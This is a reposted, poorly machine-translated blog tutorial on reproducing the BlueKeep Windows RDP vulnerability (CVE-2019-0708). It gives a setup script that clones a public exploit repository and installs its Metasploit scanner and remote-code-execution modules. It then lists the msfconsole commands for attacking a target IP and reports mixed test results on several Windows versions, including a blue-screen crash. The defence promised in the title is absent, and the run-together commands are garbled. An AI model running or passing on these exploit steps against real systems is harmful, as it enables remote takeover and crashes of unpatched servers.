Shulou(Shulou.com)05/31 Report--

CVE-2019-0708 reproduction and defense means, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

I. description of vulnerabilities

On May 15, 2019, Windows series servers were exposed with high-risk vulnerabilities, which affected a wide range of systems, such as windows2003, windows2008, windows2008 R2, and windows xp. The server was exploited through the remote desktop port 3389.

2. Methods of vulnerability exploitation

For the convenience of testing, just throw out a script written by yourself and follow the steps below, using the kali linxu system.

1. Create a script file * .sh, and chmod + x * .sh pays it executable attributes

two。 Copy the following code directly to * .sh, and then run. / * .sh to prepare the attack environment. (note: the script helps update MSF, which is a must! Otherwise, the frame will not be loaded)

# Update your MSFapt-get updateapt-get installmetasploit-framework#Download cve-2019-0708git clone https://github.com/NAXG/cve_2019_0708_bluekeep_rce.git#Mkdir for cvemkdir-p/usr/share/metasploit-framework/ lib/msf/core/exploit/mkdir-p/usr/share/metasploit-framework/modules/auxiliary/scanner/mkdir-p/usr/share/metasploit-framework/modules/exploits/windows/rdp/mkdir-p/usr/share/metasploit-framework/modules/auxiliary/scanner/ Rdp/#Copy .rb to target dircd cve_2019_0708_bluekeep_rce/cp rdp.rb / usr/share/metasploit-framework/lib/msf/core/exploit/cp rdp_scanner.rb / usr/share/metasploit-framework/modules/auxiliary/scanner/cp cve_2019_0708_bluekeep_rce.rb / usr/share/metasploit-framework/modules/exploits/windows/rdp/cp cve_2019_0708_bluekeep.rb / usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

After downloading, CVE-2019-0708 contains two modules, a scanning module cve_2019_0708_bluekeep and an attack module cve_2019_0708_bluekeep_rce, which can be used directly.

3. Continue to do the following to start the test

Msfconsole

Reload_all

Use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

Set rhosts 192.168.80.111 (target IP)

Set target 3 (target environment, which one should be used in the second figure below, or just type info under the module)

Run

Start testing (the systems are all virtual machines)

1. Test winxp-sp3

Yes, XP is as steady as Mount Tai! Although not a few patches, but it is not false!

two。 Test win7-x64-sp1

As steady as. Is this the reality? It won't work at all.

3. Test server2008-x64-R2-SP1

Yes, not only didn't get the shell, but also hit the blue screen, changed a parameter, and made it unresponsive.

4. Test server-2003- Enterprise Edition

It won't work. Seems to know something...

5. Test win10-x64 Professional Edition

Of course, you have to try it on your own machine. It doesn't work at all without a patch.

Fourth, write at the end

Although this test has not been successfully repeated, but after twists and turns, I think of a word "not satisfied with soil and water". I have done a lot of penetration tests because I am not satisfied with soil and water-- it can only be repeated by finding a specific system and doing a specific configuration. Some even have to configure a specific system language.

In fact, the CVE also has to configure something on the 2008R2 to pass, but it is too far from the real environment, so it is not configured, just test the authentic, and … Penetration test is recommended not to use this, blue screen no one can stand!

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.